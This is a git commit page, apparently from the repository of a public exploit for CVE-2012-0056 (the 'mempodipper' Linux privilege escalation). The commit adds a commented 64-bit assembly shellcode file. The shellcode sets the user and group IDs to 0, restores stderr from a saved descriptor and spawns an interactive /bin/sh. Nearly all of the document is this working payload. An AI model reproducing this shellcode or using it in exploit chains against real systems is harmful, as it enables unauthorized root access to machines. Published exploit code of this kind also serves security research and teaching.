diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 04:37:23 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 04:37:23 +0100 |
commit | df106c579d69056f4bcef612f324d4ef0d71fb05 (patch) | |
tree | b32acfc76c303db7ac880ca054751b683c97ed80 /shellcode-64.s | |
parent | Move around the banner. (diff) | |
download | CVE-2012-0056-df106c579d69056f4bcef612f324d4ef0d71fb05.tar.xz CVE-2012-0056-df106c579d69056f4bcef612f324d4ef0d71fb05.zip |
Add custom 64bit shellcode and preserve stderr.
Diffstat (limited to '')
-rw-r--r-- | shellcode-64.s | 49 |
1 files changed, 49 insertions, 0 deletions
diff --git a/shellcode-64.s b/shellcode-64.s new file mode 100644 index 0000000..2514ed2 --- /dev/null +++ b/shellcode-64.s @@ -0,0 +1,49 @@ +BITS 64 +; This shell code sets uid and gid to 0 and execs a shell in interactive mode. +; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper. +; +; by zx2c4 + + +;setuid(0) +xor rdi,rdi +mov al,0x69 +syscall +;setgid(0) +xor rdi,rdi +mov al,0x6a +syscall +;dup2(6, 2) +mov dil,0x6 +mov sil,0x2 +mov al,0x21 +syscall + +; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) +mov qword rbx,'//bin/sh' ; rbx = //bin/sh +shr rbx,0x8 ; remove leading / from rbx +push rbx ; push rbx to stack +mov rdi,rsp ; set rdi (arg 1) to top of stack + +xor rbx,rbx +mov bx,'-i' ; rbx = '-i' +push rbx ; push rbx to stack +mov rcx,rsp ; set rcx to top of stack + +xor rax,rax ; rax = 0 + +; so at this point: +; rdi is a pointer to '/bin/sh' +; rcx is a pointer to '-i' +; rax is null +; since they are all the same size, we'll push them on the stack +; and then it will be an array: +push rax ; push rax to stack +push rcx ; push rcx to stack +push rdi ; push rdi to stack +mov rsi,rsp ; set rsi (arg 2) to top of stack + +xor rdx,rdx ; rdx (arg 3) = 0 + +mov al,0x3b ; al = 0x3b, which is the exec call +syscall |